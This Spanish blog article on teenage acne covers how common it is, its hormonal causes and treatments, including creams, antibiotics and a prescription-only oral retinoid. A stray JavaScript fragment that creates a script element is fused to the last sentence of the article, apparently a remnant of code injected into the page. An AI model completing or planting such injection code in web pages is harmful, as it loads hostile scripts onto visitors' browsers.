Salud y belleza » Belleza, Medicina

Soluciones para el acné juvenil

Sin Comentarios

Cuando la adolescencia se vuelve un “grano”

Cuando se trata de problemas estéticos como el acné, fácilmente la adolescencia puede perder un par de letras en el camino y transformarse, simplemente, en otro término: adolecer, por ejemplo. Efectivamente, frente a la superpoblación de granos en el rostro, es factible que un período maravilloso como la adolescencia termine complicándose más de lo que debería para transformarse, al final, en un verdadero calvario.

Está comprobado que, cuando se padece de acné juvenil, se sufren trabas de diferentes tipos: las dificultades de la apariencia conllevan, en muchas oportunidades, a otras incluso de índole psicológicas.

De acuerdo con estudios epidemiológicos internacionales, lo sufre cerca del 80 por ciento de los chicos de entre 12 y 18 años. Además, como ya dijimos, si bien no es una patología grave sí puede serlo cuando sus consecuencias afectan el orden psicológico.

De esta manera, lo que presentaremos a continuación no es una solución: se trata, en todo caso, de un conjunto de soluciones contra el acné o, mejor aún, una receta para poder disfrutar la adolescencia sin adolecer ningún tipo de mal.

Ante todo es necesario diferenciar lo que es acné juvenil con el acné regular o aquellos granos que surgen por razones diferentes. Ocurre que, en la adolescencia, las erupciones son provocadas una serie de cambios hormonales que empiezan a producirse en varones y mujeres a partir de los doce o quince años.

En esa etapa del desarrollo, se produce en el organismo un aumento en la elaboración de andrógenos: esta hormona obliga, a su vez, a que también se duplique la secreción de las glándulas sebáceas lo cual finaliza con la salida del acné pues se potencian las bacterias de la piel” afirma un famoso dermatólogo.

Desafortunadamente, el acné juvenil es inevitable pero, atención, lo que sí es se alza como una posibilidad es el uso de determinadas técnicas o bien para secar los granos o bien para evitar su desarrollo total y volverlos imperceptibles. Las opciones para controlar el acné abarcan cremas, lociones astringentes o antibióticos orales. A veces los expertos recomiendan un uso combinado.

Lo más novedoso en materia de acné juvenil es un retinoide oral que funciona inhibiendo la formación de glándulas sebáceas. Aunque, por tratarse de un fármaco potente, este debe usarse con estricto control médico y solo bajo prescripción médica.
A la hora de consumirlo, naturalmente es necesario informarse sobre los efectos y contraindicaciones.}var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.